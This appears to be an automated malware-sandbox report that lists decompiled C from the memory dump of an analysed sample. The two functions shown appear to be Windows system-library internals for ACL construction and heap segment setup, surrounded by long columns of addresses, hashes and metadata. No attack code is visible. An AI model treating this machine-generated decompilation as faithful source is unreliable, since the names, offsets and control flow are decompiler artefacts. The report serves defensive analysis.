                                                                                                                              0x1d7c600c
                                                                                                                              0x00000000
                                                                                                                              0x1d7c600c
                                                                                                                              0x1d7c5ed2
                                                                                                                              0x1d7c5ed2
                                                                                                                              0x1d7c5ed5
                                                                                                                              0x1d7c5ed8
                                                                                                                              0x1d7c5eda
                                                                                                                              0x1d7c5edc
                                                                                                                              0x1d7c5ee3
                                                                                                                              0x1d7c5eee
                                                                                                                              0x1d7c5eee
                                                                                                                              0x1d7c5ef0
                                                                                                                              0x1d7c5f50
                                                                                                                              0x1d7c5f50
                                                                                                                              0x1d7c5f55
                                                                                                                              0x1d7c5f63
                                                                                                                              0x1d7c5f6a
                                                                                                                              0x1d7c5f6f
                                                                                                                              0x1d7c5f6f
                                                                                                                              0x1d7c5f72
                                                                                                                              0x1d7c5f74
                                                                                                                              0x1d7c5f77
                                                                                                                              0x1d7c5f77
                                                                                                                              0x1d7c5f79
                                                                                                                              0x1d7c6010
                                                                                                                              0x1d7c6010
                                                                                                                              0x00000000
                                                                                                                              0x1d7c6010
                                                                                                                              0x1d7c5f8d
                                                                                                                              0x1d7c5f8f
                                                                                                                              0x1d7c5f91
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7c5f91
                                                                                                                              0x1d7c5ef2
                                                                                                                              0x1d7c5ef2
                                                                                                                              0x1d7c5ef5
                                                                                                                              0x1d7c5f2e
                                                                                                                              0x1d7c5f3c
                                                                                                                              0x1d7c5f43
                                                                                                                              0x00000000
                                                                                                                              0x1d7c5f43
                                                                                                                              0x1d7c5ef7
                                                                                                                              0x1d7c5efa
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7c5f07
                                                                                                                              0x1d7c5f15
                                                                                                                              0x1d7c5f1c
                                                                                                                              0x00000000
                                                                                                                              0x1d7c5f93
                                                                                                                              0x1d7c5f96
                                                                                                                              0x1d7c5f99
                                                                                                                              0x1d7c5f9a
                                                                                                                              0x1d7c5f9d
                                                                                                                              0x1d7c5f9d
                                                                                                                              0x1d7c5fa6
                                                                                                                              0x00000000
                                                                                                                              0x1d7c5fa6
                                                                                                                              0x1d7c5ea3
                                                                                                                              0x00000000
                                                                                                                              0x1d7c5ea3
                                                                                                                              0x1d7c5e73
                                                                                                                              0x1d7c5e7b
                                                                                                                              0x1d7c5e7f
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7c5e7f
                                                                                                                              0x1d7c5e4f
                                                                                                                              0x1d7c5e52
                                                                                                                              0x1d7c5e5a
                                                                                                                              0x1d7c5e5e
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7c5e64
                                                                                                                              0x00000000
                                                                                                                              0x1d7c5e64
                                                                                                                              0x1d7c5e1a
                                                                                                                              0x1d7c5e1f
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7c5e25
                                                                                                                              0x00000000
                                                                                                                              0x1d7c5e25
                                                                                                                              0x1d7c5e08
                                                                                                                              0x1d7c5e08
                                                                                                                              0x1d7c5e0d
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7c5e13
                                                                                                                              0x00000000
                                                                                                                              0x1d7c5e13
                                                                                                                              0x1d7c5d97
                                                                                                                              0x1d7c5d9a
                                                                                                                              0x1d7c5d9f
                                                                                                                              0x1d7c5da6
                                                                                                                              0x1d7c5da9
                                                                                                                              0x1d7c5dd2
                                                                                                                              0x1d7c5dd2
                                                                                                                              0x1d7c5dd9
                                                                                                                              0x1d7c5ddc
                                                                                                                              0x1d7c5dde
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7c5de4
                                                                                                                              0x00000000
                                                                                                                              0x1d7c5de4
                                                                                                                              0x1d7c5dab
                                                                                                                              0x1d7c5dae
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7c5db3
                                                                                                                              0x00000000
                                                                                                                              0x1d7c5eb7
                                                                                                                              0x1d7c5db9
                                                                                                                              0x1d7c5dc0
                                                                                                                              0x1d7c5dc5
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7c5dcb
                                                                                                                              0x1d7c5dcd
                                                                                                                              0x1d7c5de6
                                                                                                                              0x1d7c5de9
                                                                                                                              0x1d7c5deb
                                                                                                                              0x1d7c5deb
                                                                                                                              0x1d7c5df1
                                                                                                                              0x1d7c5df4
                                                                                                                              0x1d7c5df5
                                                                                                                              0x1d7c5df8
                                                                                                                              0x1d7c5dfd
                                                                                                                              0x00000000

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 7c66d3df6bdf27e917441d824e865114f08694fdebf889f82a8f4f91d3ef02b7
                                                                                                                              • Instruction ID: 60e3ce4b30d6f26905028c452a47056435aeea1bd7f3b0a80f2338cefc7851ed
                                                                                                                              • Opcode Fuzzy Hash: 7c66d3df6bdf27e917441d824e865114f08694fdebf889f82a8f4f91d3ef02b7
                                                                                                                              • Instruction Fuzzy Hash: 7D91B171D04216AFCB15CFA4D8C4BAEBBB5AF49720F11415AEA00FB351E735E940DBA2
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D7DB420 Relevance: .2, Instructions: 236COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 95%
                                                                                                                              			E1D7DB420(signed int __edx, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int* _a28) {
				signed int _v8;
				char _v264;
				short _v268;
				signed int _v272;
				char _v273;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				intOrPtr _v296;
				signed int _v300;
				signed int* _v304;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int* _t96;
				signed int _t97;
				signed int _t100;
				char _t106;
				signed int _t107;
				signed int _t111;
				signed int _t113;
				intOrPtr _t114;
				void* _t115;
				signed int _t117;
				signed int _t120;
				intOrPtr _t138;
				signed int _t144;
				signed int _t146;
				signed int _t147;
				void* _t151;
				intOrPtr _t156;
				intOrPtr* _t165;
				signed int _t166;
				intOrPtr _t167;
				signed int _t168;
				signed int _t169;
				void* _t170;
				signed int _t171;

				_t164 = __edx;
				_v8 =  *0x1d83b370 ^ _t171;
				_t167 = _a20;
				_t166 = _a4;
				_v288 = _a24;
				_v300 = 0;
				_t146 = 0;
				_v272 = 0;
				_v296 = _t167;
				_v304 = _a28;
				_v268 = 0x100;
				E1D788F40( &_v264, 0, 0x100);
				_t96 = _v304;
				_v284 = 0x100;
				if(_t96 != 0) {
					 *_t96 =  *_t96 & 0;
					__eflags = _t166;
					if(__eflags != 0) {
						_push(_t167);
						_t97 = E1D763D20(0, _t166, _t167, __eflags);
						__eflags = _t97;
						if(_t97 != 0) {
							_t100 = E1D788870(_t167 + 2,  &_v272, 6);
							__eflags = _t100;
							if(_t100 != 0) {
								goto L1;
							}
							__eflags =  *((char*)(_t167 + 1)) - 1;
							if( *((char*)(_t167 + 1)) != 1) {
								L38:
								_t168 = 0xc000000d;
								L39:
								__eflags = _t146;
								if(_t146 != 0) {
									__eflags = _t146 -  &_v264;
									if(_t146 !=  &_v264) {
										E1D753BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t146);
									}
								}
								goto L42;
							}
							__eflags =  *(_t167 + 8);
							if( *(_t167 + 8) != 0) {
								goto L38;
							}
							_t106 =  *_t166;
							_v273 = _t106;
							__eflags = _t106 - 4;
							if(_t106 > 4) {
								L37:
								_t168 = 0xc0000059;
								goto L42;
							}
							_t151 = 4;
							__eflags = _a8 - _t151;
							if(_a8 > _t151) {
								goto L37;
							}
							__eflags = _t106 - _a8;
							if(_t106 <= _a8) {
								_v273 = _a8;
							}
							__eflags = _a12 & 0xffffffe0;
							if((_a12 & 0xffffffe0) != 0) {
								goto L1;
							} else {
								__eflags = _a16 - _t146;
								if(_a16 != _t146) {
									goto L1;
								}
								_t169 = _v288;
								_t152 = _t169;
								_t107 = E1D7DCDAF(_t169);
								__eflags = _t107;
								if(_t107 == 0) {
									goto L1;
								}
								__eflags =  *((intOrPtr*)(_t169 + 4)) - 1;
								if( *((intOrPtr*)(_t169 + 4)) != 1) {
									goto L1;
								}
								_t146 =  &_v264;
								_v272 = _t146;
								_t168 = E1D7DBB40( *((intOrPtr*)(_t169 + 8)), _t146,  &_v284);
								_v292 = _t168;
								__eflags = _t168 - 0xc0000023;
								if(_t168 != 0xc0000023) {
									L21:
									__eflags = _t168;
									if(__eflags < 0) {
										goto L39;
									}
									_push(_t166);
									_t111 = E1D763770(_t146, _t166, _t168, __eflags);
									__eflags = _t111;
									if(_t111 != 0) {
										_t113 = E1D767F70(_t152, _t166,  &_v300);
										__eflags = _t113;
										if(_t113 == 0) {
											goto L23;
										}
										_t114 = _v296;
										_t115 = 4;
										_t155 = ( *(_t114 + 1) & 0x000000ff) + _t115 << 2;
										__eflags = _v284 - 0xffff;
										_v280 = ( *(_t114 + 1) & 0x000000ff) + _t115 << 2;
										if(_v284 > 0xffff) {
											L36:
											_t168 = 0xc0000095;
											goto L39;
										}
										_t164 = _v284;
										_t117 = E1D7D7828(_t155, _v284,  &_v280);
										__eflags = _t117;
										if(_t117 < 0) {
											goto L36;
										}
										_t165 = _v304;
										_v288 = _v288 & 0x00000000;
										_t156 = 8;
										 *_t165 = _t156;
										__eflags = 0 -  *(_t166 + 4);
										if(0 >=  *(_t166 + 4)) {
											L31:
											_t120 = (_v280 & 0x0000ffff) + _t156;
											 *_t165 = _t120;
											_t164 = _v300;
											_v272 = _t120;
											__eflags = _t164;
											if(_t164 == 0) {
												L35:
												_t168 = 0xc0000099;
												 *_v304 = _t120 + 0x00000003 & 0xfffffffc;
												goto L39;
											}
											_t168 = _v292;
											__eflags = (_v280 & 0x0000ffff) + _t164 - ( *(_t166 + 2) & 0x0000ffff) + _t166;
											if((_v280 & 0x0000ffff) + _t164 > ( *(_t166 + 2) & 0x0000ffff) + _t166) {
												_t120 = _v272;
												goto L35;
											}
											 *(_t164 + 4) =  *(_t164 + 4) & 0x00000000;
											 *((char*)(_t164 + 1)) = _a12;
											 *((short*)(_t164 + 2)) = _v280;
											 *_t164 = 0x12;
											E1D766850(8 + ( *(_v296 + 1) & 0x000000ff) * 4, _t164 + 8, _v296);
											E1D7888C0(_v300 + 0x10 + ( *(_v296 + 1) & 0x000000ff) * 4, _t146, _v284);
											 *(_t166 + 4) =  *(_t166 + 4) + 1;
											 *_t166 = _v273;
											goto L39;
										}
										_t147 = _v288;
										_t170 = _t166 + 8;
										do {
											_t156 = ( *(_t170 + 2) & 0x0000ffff) +  *_t165;
											_t147 = _t147 + 1;
											 *_t165 = _t156;
											_t170 = _t170 + ( *(_t170 + 2) & 0x0000ffff);
											__eflags = _t147 - ( *(_t166 + 4) & 0x0000ffff);
										} while (_t147 < ( *(_t166 + 4) & 0x0000ffff));
										_t146 = _v272;
										goto L31;
									}
									L23:
									_t168 = 0xc0000077;
									goto L39;
								}
								_t138 =  *0x1d835d78; // 0x0
								_t146 = E1D755D90(_t152,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t138 + 0x140000, _v284);
								_v272 = _t146;
								__eflags = _t146;
								if(_t146 != 0) {
									_t144 = E1D7DBB40( *((intOrPtr*)(_v288 + 8)), _t146,  &_v284);
									_t168 = _t144;
									_v292 = _t144;
									goto L21;
								}
								_t168 = _t168 + 0xfffffff4;
								goto L42;
							}
						}
						_t168 = 0xc0000078;
						goto L42;
					} else {
						_t168 = 0xc0000077;
						L42:
						return E1D784B50(_t168, _t146, _v8 ^ _t171, _t164, _t166, _t168);
					}
				}
				L1:
				_t168 = 0xc000000d;
				goto L42;
			}











































                                                                                                                              0x1d7db420
                                                                                                                              0x1d7db432
                                                                                                                              0x1d7db43d
                                                                                                                              0x1d7db441
                                                                                                                              0x1d7db444
                                                                                                                              0x1d7db452
                                                                                                                              0x1d7db458
                                                                                                                              0x1d7db45a
                                                                                                                              0x1d7db467
                                                                                                                              0x1d7db46d
                                                                                                                              0x1d7db473
                                                                                                                              0x1d7db47c
                                                                                                                              0x1d7db481
                                                                                                                              0x1d7db48a
                                                                                                                              0x1d7db496
                                                                                                                              0x1d7db4a2
                                                                                                                              0x1d7db4a4
                                                                                                                              0x1d7db4a6
                                                                                                                              0x1d7db4b2
                                                                                                                              0x1d7db4b3
                                                                                                                              0x1d7db4b8
                                                                                                                              0x1d7db4ba
                                                                                                                              0x1d7db4d3
                                                                                                                              0x1d7db4db
                                                                                                                              0x1d7db4dd
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7db4df
                                                                                                                              0x1d7db4e3
                                                                                                                              0x1d7db74b
                                                                                                                              0x1d7db74b
                                                                                                                              0x1d7db750
                                                                                                                              0x1d7db750
                                                                                                                              0x1d7db752
                                                                                                                              0x1d7db75a
                                                                                                                              0x1d7db75c
                                                                                                                              0x1d7db76a
                                                                                                                              0x1d7db76a
                                                                                                                              0x1d7db75c
                                                                                                                              0x00000000
                                                                                                                              0x1d7db752
                                                                                                                              0x1d7db4e9
                                                                                                                              0x1d7db4ec
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7db4f2
                                                                                                                              0x1d7db4f4
                                                                                                                              0x1d7db4fa
                                                                                                                              0x1d7db4fc
                                                                                                                              0x1d7db744
                                                                                                                              0x1d7db744
                                                                                                                              0x00000000
                                                                                                                              0x1d7db744
                                                                                                                              0x1d7db504
                                                                                                                              0x1d7db505
                                                                                                                              0x1d7db508
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7db50e
                                                                                                                              0x1d7db511
                                                                                                                              0x1d7db516
                                                                                                                              0x1d7db516
                                                                                                                              0x1d7db51c
                                                                                                                              0x1d7db523
                                                                                                                              0x00000000
                                                                                                                              0x1d7db529
                                                                                                                              0x1d7db529
                                                                                                                              0x1d7db52c
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7db532
                                                                                                                              0x1d7db538
                                                                                                                              0x1d7db53a
                                                                                                                              0x1d7db53f
                                                                                                                              0x1d7db541
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7db547
                                                                                                                              0x1d7db54b
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7db558
                                                                                                                              0x1d7db560
                                                                                                                              0x1d7db56f
                                                                                                                              0x1d7db571
                                                                                                                              0x1d7db577
                                                                                                                              0x1d7db57d
                                                                                                                              0x1d7db5d0
                                                                                                                              0x1d7db5d0
                                                                                                                              0x1d7db5d2
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7db5d8
                                                                                                                              0x1d7db5d9
                                                                                                                              0x1d7db5de
                                                                                                                              0x1d7db5e0
                                                                                                                              0x1d7db5f4
                                                                                                                              0x1d7db5f9
                                                                                                                              0x1d7db5fb
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7db5fd
                                                                                                                              0x1d7db609
                                                                                                                              0x1d7db60d
                                                                                                                              0x1d7db611
                                                                                                                              0x1d7db61b
                                                                                                                              0x1d7db622
                                                                                                                              0x1d7db73d
                                                                                                                              0x1d7db73d
                                                                                                                              0x00000000
                                                                                                                              0x1d7db73d
                                                                                                                              0x1d7db628
                                                                                                                              0x1d7db635
                                                                                                                              0x1d7db63a
                                                                                                                              0x1d7db63c
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7db642
                                                                                                                              0x1d7db64a
                                                                                                                              0x1d7db653
                                                                                                                              0x1d7db654
                                                                                                                              0x1d7db656
                                                                                                                              0x1d7db65a
                                                                                                                              0x1d7db682
                                                                                                                              0x1d7db689
                                                                                                                              0x1d7db68b
                                                                                                                              0x1d7db68d
                                                                                                                              0x1d7db693
                                                                                                                              0x1d7db699
                                                                                                                              0x1d7db69b
                                                                                                                              0x1d7db728
                                                                                                                              0x1d7db734
                                                                                                                              0x1d7db739
                                                                                                                              0x00000000
                                                                                                                              0x1d7db739
                                                                                                                              0x1d7db6ae
                                                                                                                              0x1d7db6b6
                                                                                                                              0x1d7db6b8
                                                                                                                              0x1d7db722
                                                                                                                              0x00000000
                                                                                                                              0x1d7db722
                                                                                                                              0x1d7db6c3
                                                                                                                              0x1d7db6c7
                                                                                                                              0x1d7db6d1
                                                                                                                              0x1d7db6da
                                                                                                                              0x1d7db6e9
                                                                                                                              0x1d7db70c
                                                                                                                              0x1d7db71a
                                                                                                                              0x1d7db71e
                                                                                                                              0x00000000
                                                                                                                              0x1d7db71e
                                                                                                                              0x1d7db65c
                                                                                                                              0x1d7db662
                                                                                                                              0x1d7db665
                                                                                                                              0x1d7db669
                                                                                                                              0x1d7db66b
                                                                                                                              0x1d7db66c
                                                                                                                              0x1d7db672
                                                                                                                              0x1d7db678
                                                                                                                              0x1d7db678
                                                                                                                              0x1d7db67c
                                                                                                                              0x00000000
                                                                                                                              0x1d7db67c
                                                                                                                              0x1d7db5e2
                                                                                                                              0x1d7db5e2
                                                                                                                              0x00000000
                                                                                                                              0x1d7db5e2
                                                                                                                              0x1d7db57f
                                                                                                                              0x1d7db59e
                                                                                                                              0x1d7db5a0
                                                                                                                              0x1d7db5a6
                                                                                                                              0x1d7db5a8
                                                                                                                              0x1d7db5c3
                                                                                                                              0x1d7db5c8
                                                                                                                              0x1d7db5ca
                                                                                                                              0x00000000
                                                                                                                              0x1d7db5ca
                                                                                                                              0x1d7db5aa
                                                                                                                              0x00000000
                                                                                                                              0x1d7db5aa
                                                                                                                              0x1d7db523
                                                                                                                              0x1d7db4bc
                                                                                                                              0x00000000
                                                                                                                              0x1d7db4a8
                                                                                                                              0x1d7db4a8
                                                                                                                              0x1d7db76f
                                                                                                                              0x1d7db77f
                                                                                                                              0x1d7db77f
                                                                                                                              0x1d7db4a6
                                                                                                                              0x1d7db498
                                                                                                                              0x1d7db498
                                                                                                                              0x00000000

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: d25c71a89b7356ee8a3c614deb681d73e776cbf4de955e375efde793bc25cf6f
                                                                                                                              • Instruction ID: 3f24b53703f188019222ad700a2c6db7cb1473cfa50c7449f677973f1d27d88d
                                                                                                                              • Opcode Fuzzy Hash: d25c71a89b7356ee8a3c614deb681d73e776cbf4de955e375efde793bc25cf6f
                                                                                                                              • Instruction Fuzzy Hash: E091C3759007699BCB51CF14D880BF9B7B4AF09324F0581EAEA8CA7241D734EE91CF92
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D771EED Relevance: .2, Instructions: 210COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 51%
                                                                                                                              			E1D771EED(signed int __ecx, signed int* __edx, intOrPtr _a4, signed int _a12, signed int _a16, char _a20, intOrPtr _a24) {
				void* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* __ebx;
				signed int _t102;
				signed int _t107;
				void* _t110;
				char* _t119;
				signed int _t120;
				signed int _t124;
				signed int _t126;
				signed int _t129;
				signed int _t136;
				signed int _t142;
				char _t156;
				intOrPtr _t159;
				signed int _t170;
				signed int _t172;
				void* _t173;
				void* _t175;
				signed int _t179;
				signed int _t184;
				signed int _t185;
				signed int _t191;
				signed int* _t192;
				signed int* _t193;

				_t191 = __ecx;
				_t159 = _a24;
				_t192 = __edx;
				_v24 =  *((intOrPtr*)( *[fs:0x30] + 0x68));
				_t102 = _t159 - _a16;
				if(_t102 > 0xfffff000) {
					L15:
					return 0;
				}
				asm("cdq");
				_t156 = _a20;
				_v16 = _t102 / 0x1000;
				_t107 = _a4 + 0x00000007 & 0xfffffff8;
				_t179 = _t107 + __edx;
				_v20 = _t107 >> 0x00000003 & 0x0000ffff;
				_t110 = _t179 + 0x28;
				_v12 = _t179;
				if(_t110 >= _t156) {
					if(_t110 >= _t159) {
						goto L15;
					}
					_v8 = _t179 - _t156 + 8;
					if(E1D7768EA( *((intOrPtr*)(__ecx + 0x1f8)) -  *((intOrPtr*)(__ecx + 0x244)), __ecx, __ecx + 0xd4) == 0) {
						L26:
						 *((intOrPtr*)(_t191 + 0x224)) =  *((intOrPtr*)(_t191 + 0x224)) + 1;
						goto L15;
					}
					_push(E1D73F0E1(__ecx, 1));
					_push(0x1000);
					_push( &_v8);
					_push(0);
					_push( &_a20);
					_push(0xffffffff);
					if(E1D782B10() < 0) {
						goto L26;
					}
					if(E1D753C40() == 0) {
						_t119 = 0x7ffe0380;
					} else {
						_t119 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t119 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E1D7FEFD3(_t156, _t191, _a20, _v8, 3);
					}
					_t156 = _a20 + _v8;
					_t159 = _a24;
					_a20 = _t156;
				}
				_t192[0] = 1;
				_t120 = _t159 - _t156;
				_t192[1] = 1;
				asm("cdq");
				_t184 = _t120 % 0x1000;
				_v28 = _t120 / 0x1000;
				 *_t192 = _v20;
				_t192[1] =  *(_t191 + 0x54);
				if((_v24 & 0x00001000) != 0) {
					_t124 = E1D76FDB9(1, _t184);
					_t156 = _a20;
					_t192[0xd] = _t124;
				}
				_t192[0xb] = _t192[0xb] & 0x00000000;
				_t185 = _v12;
				_t192[3] = _a12;
				_t126 = _a16;
				_t192[7] = _t126;
				_t170 = _v16 << 0xc;
				_t192[6] = _t191;
				_t192[0xa] = _t126 + _t170;
				_t192[8] = _v16;
				_t129 =  &(_t192[0xe]);
				_t192[2] = 0xffeeffee;
				_t192[9] = _t185;
				 *((intOrPtr*)(_t191 + 0x1f8)) =  *((intOrPtr*)(_t191 + 0x1f8)) + _t170;
				 *((intOrPtr*)(_t191 + 0x1f4)) =  *((intOrPtr*)(_t191 + 0x1f4)) + _t170;
				 *(_t129 + 4) = _t129;
				 *_t129 = _t129;
				_t192[1] = _t129 & 0xffffff00 | _t192[6] != _t192;
				 *(_t185 + 4) =  *_t192 ^  *(_t191 + 0x54);
				if(_t192[6] != _t192) {
					_t136 = (_t185 - _t192 >> 0x10) + 1;
					_v24 = _t136;
					if(_t136 >= 0xfe) {
						_push(0);
						_push(0);
						_push(_t192);
						_push(_t185);
						_t175 = 3;
						E1D805FED(_t175, _t192[6]);
						_t156 = _a20;
						_t185 = _v12;
						_t136 = _v24;
					}
				} else {
					_t136 = 0;
				}
				 *(_t185 + 6) = _t136;
				E1D75096B(_t191, _t192, _t156 - 0x18, _v28 << 0xc, _t185,  &_v8);
				if( *((intOrPtr*)(_t191 + 0x4c)) != 0) {
					_t192[0] = _t192[0] ^  *_t192 ^ _t192[0];
					 *_t192 =  *_t192 ^  *(_t191 + 0x50);
				}
				if(_v8 != 0) {
					E1D750B10(_t191, _v12, _v8);
				}
				_t142 = _t191 + 0xa4;
				_t193 =  &(_t192[4]);
				_t172 =  *(_t142 + 4);
				if( *_t172 != _t142) {
					_push(0);
					_push( *_t172);
					_push(0);
					_push(_t142);
					_t173 = 0xd;
					E1D805FED(_t173, 0);
				} else {
					 *_t193 = _t142;
					_t193[1] = _t172;
					 *_t172 = _t193;
					 *(_t142 + 4) = _t193;
				}
				 *((intOrPtr*)(_t191 + 0x204)) =  *((intOrPtr*)(_t191 + 0x204)) + 1;
				return 1;
			}
































                                                                                                                              0x1d771f01
                                                                                                                              0x1d771f03
                                                                                                                              0x1d771f06
                                                                                                                              0x1d771f08
                                                                                                                              0x1d771f0d
                                                                                                                              0x1d771f15
                                                                                                                              0x1d772088
                                                                                                                              0x00000000
                                                                                                                              0x1d772088
                                                                                                                              0x1d771f1b
                                                                                                                              0x1d771f23
                                                                                                                              0x1d771f26
                                                                                                                              0x1d771f2f
                                                                                                                              0x1d771f32
                                                                                                                              0x1d771f3b
                                                                                                                              0x1d771f3e
                                                                                                                              0x1d771f41
                                                                                                                              0x1d771f46
                                                                                                                              0x1d7b1d85
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7b1da6
                                                                                                                              0x1d7b1db0
                                                                                                                              0x1d7b1e2a
                                                                                                                              0x1d7b1e2a
                                                                                                                              0x00000000
                                                                                                                              0x1d7b1e2a
                                                                                                                              0x1d7b1dbc
                                                                                                                              0x1d7b1dc2
                                                                                                                              0x1d7b1dc6
                                                                                                                              0x1d7b1dc7
                                                                                                                              0x1d7b1dcc
                                                                                                                              0x1d7b1dcd
                                                                                                                              0x1d7b1dd6
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7b1ddf
                                                                                                                              0x1d7b1df1
                                                                                                                              0x1d7b1de1
                                                                                                                              0x1d7b1dea
                                                                                                                              0x1d7b1dea
                                                                                                                              0x1d7b1df9
                                                                                                                              0x1d7b1e14
                                                                                                                              0x1d7b1e14
                                                                                                                              0x1d7b1e1c
                                                                                                                              0x1d7b1e1f
                                                                                                                              0x1d7b1e22
                                                                                                                              0x1d7b1e22
                                                                                                                              0x1d771f4e
                                                                                                                              0x1d771f54
                                                                                                                              0x1d771f56
                                                                                                                              0x1d771f5a
                                                                                                                              0x1d771f60
                                                                                                                              0x1d771f62
                                                                                                                              0x1d771f68
                                                                                                                              0x1d771f74
                                                                                                                              0x1d771f7b
                                                                                                                              0x1d7b1e38
                                                                                                                              0x1d7b1e3d
                                                                                                                              0x1d7b1e40
                                                                                                                              0x1d7b1e40
                                                                                                                              0x1d771f87
                                                                                                                              0x1d771f8b
                                                                                                                              0x1d771f8e
                                                                                                                              0x1d771f91
                                                                                                                              0x1d771f94
                                                                                                                              0x1d771f97
                                                                                                                              0x1d771f9c
                                                                                                                              0x1d771f9f
                                                                                                                              0x1d771fa5
                                                                                                                              0x1d771fa8
                                                                                                                              0x1d771fab
                                                                                                                              0x1d771fb2
                                                                                                                              0x1d771fb5
                                                                                                                              0x1d771fbb
                                                                                                                              0x1d771fc1
                                                                                                                              0x1d771fc4
                                                                                                                              0x1d771fcc
                                                                                                                              0x1d771fd6
                                                                                                                              0x1d771fdd
                                                                                                                              0x1d77205a
                                                                                                                              0x1d77205b
                                                                                                                              0x1d772063
                                                                                                                              0x1d772069
                                                                                                                              0x1d77206b
                                                                                                                              0x1d77206d
                                                                                                                              0x1d77206e
                                                                                                                              0x1d772074
                                                                                                                              0x1d772075
                                                                                                                              0x1d77207a
                                                                                                                              0x1d77207d
                                                                                                                              0x1d772080
                                                                                                                              0x1d772080
                                                                                                                              0x1d771fdf
                                                                                                                              0x1d771fdf
                                                                                                                              0x1d771fdf
                                                                                                                              0x1d771fe1
                                                                                                                              0x1d771ff8
                                                                                                                              0x1d772001
                                                                                                                              0x1d77200b
                                                                                                                              0x1d772011
                                                                                                                              0x1d772011
                                                                                                                              0x1d772017
                                                                                                                              0x1d772021
                                                                                                                              0x1d772021
                                                                                                                              0x1d772026
                                                                                                                              0x1d77202c
                                                                                                                              0x1d77202f
                                                                                                                              0x1d772034
                                                                                                                              0x1d7b1e49
                                                                                                                              0x1d7b1e4b
                                                                                                                              0x1d7b1e4f
                                                                                                                              0x1d7b1e51
                                                                                                                              0x1d7b1e54
                                                                                                                              0x1d7b1e55
                                                                                                                              0x1d77203a
                                                                                                                              0x1d77203a
                                                                                                                              0x1d77203c
                                                                                                                              0x1d77203f
                                                                                                                              0x1d772041
                                                                                                                              0x1d772041
                                                                                                                              0x1d772044
                                                                                                                              0x00000000

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: fd6017033aa2f1d9ced49093e04e4040e25303cd6ebf6b4b38438a257d4a0d1a
                                                                                                                              • Instruction ID: b287f2db8903a363cc9bcfbb7b5e225ecbf86dc096a6f52854662ad75c9211d6
